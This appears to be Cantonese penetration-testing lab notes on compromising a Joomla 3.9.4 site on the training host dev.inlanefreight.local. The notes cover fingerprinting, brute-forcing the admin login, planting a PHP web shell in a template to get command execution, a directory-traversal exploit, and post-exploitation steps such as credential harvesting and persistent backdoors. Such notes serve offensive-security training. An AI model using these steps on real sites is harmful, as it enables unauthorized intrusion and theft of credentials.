Joolmla

1. 發現點

1️⃣ 確認目標係 Joomla：

curl -s http://dev.inlanefreight.local/ | grep Joomla

出現：

<meta name="generator" content="Joomla! - Open Source Content Management" />

代表已確認用 Joomla！

2. 測試Payload

嘗試存取 README.txt：

curl -s http://dev.inlanefreight.local/README.txt | head -n 5

查看 XML 文件：

curl -s http://dev.inlanefreight.local/administrator/manifests/files/joomla.xml | xmllint --format -

找到 <version>3.9.4</version>，代表使用 Joomla 3.9.4

使用 droopescan：

droopescan scan joomla --url http://dev.inlanefreight.local

可列出版本範圍、Login 頁面、License.txt 文件

（可選）Joomlascan：

python2.7 joomlascan.py -u http://dev.inlanefreight.local

幫助尋找開放目錄或可能漏洞。

3. 暴力破解登入

Joomla 預設管理員帳號通常為 admin
使用 joomla-brute.py 爆破登入：

sudo python3 joomla-brute.py -u http://dev.inlanefreight.local -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin

成功結果：

admin:admin

拎到帳號同密碼後直接登入後台：

http://dev.inlanefreight.local/administrator/index.php

4. 濫用後台功能取得 RCE

登入成功後，我地可以利用客製化模板來寫 WebShell

1️⃣ 解除插件錯誤

若後台報錯「發生錯誤。在 null 上呼叫成員函數 format()」

進入：

http://dev.inlanefreight.local/administrator/index.php?option=com_plugins

停用 快速圖示 - PHP 版本檢查

2️⃣ 編輯模板

左邊點擊「Templates」
選 protostar > Customize
點擊 error.php
加入 payload：

<?php system($_GET['dcfdd5e021a869fcc6dfaef8bf31377e']); ?>

Save & Close

3️⃣ 執行RCE測試：

curl -s http://dev.inlanefreight.local/templates/protostar/error.php?dcfdd5e021a869fcc6dfaef8bf31377e=id

出現：

uid=33(www-data) gid=33(www-data) groups=33(www-data)

代表成功取得 shell。

4.已知漏洞利用

Joomla 核心漏洞唔多，大部分係插件漏洞。
你可以用 exploit-db 搜 joomla，再配合版本進行篩選。
常見可利用漏洞包括：
- 路徑穿越 (Directory Traversal)
- SQL Injection
- RCE 通過第三方擴展

例如：

python2.7 joomla_dir_trav.py --url "http://dev.inlanefreight.local/administrator/" --username admin --password admin --dir /

如果成功，可以下載任意路徑文件。

5. 連鎖漏洞

如果已經進入 Joomla 後台或者已經有RCE，可以繼續進行以下行動：

階段

攻擊行動

提權

嘗試 sudo -l、找 SUID 文件、弱權限服務提權

横向移動

掃描內網：netstat -an、nmap -sn 探索有冇其他主機

密碼回收

查看 configuration.php 裏面有冇數據庫密碼 / 或其他帳密洩露

持久化後門

再寫 shell 落 /images 或 modules，並放置後門連線

秘密蒐集

find / -name "*flag*" 或 `find / -name "*.txt"

上一页Wordpress 下一页Drupal

最后更新于1个月前

这有帮助吗？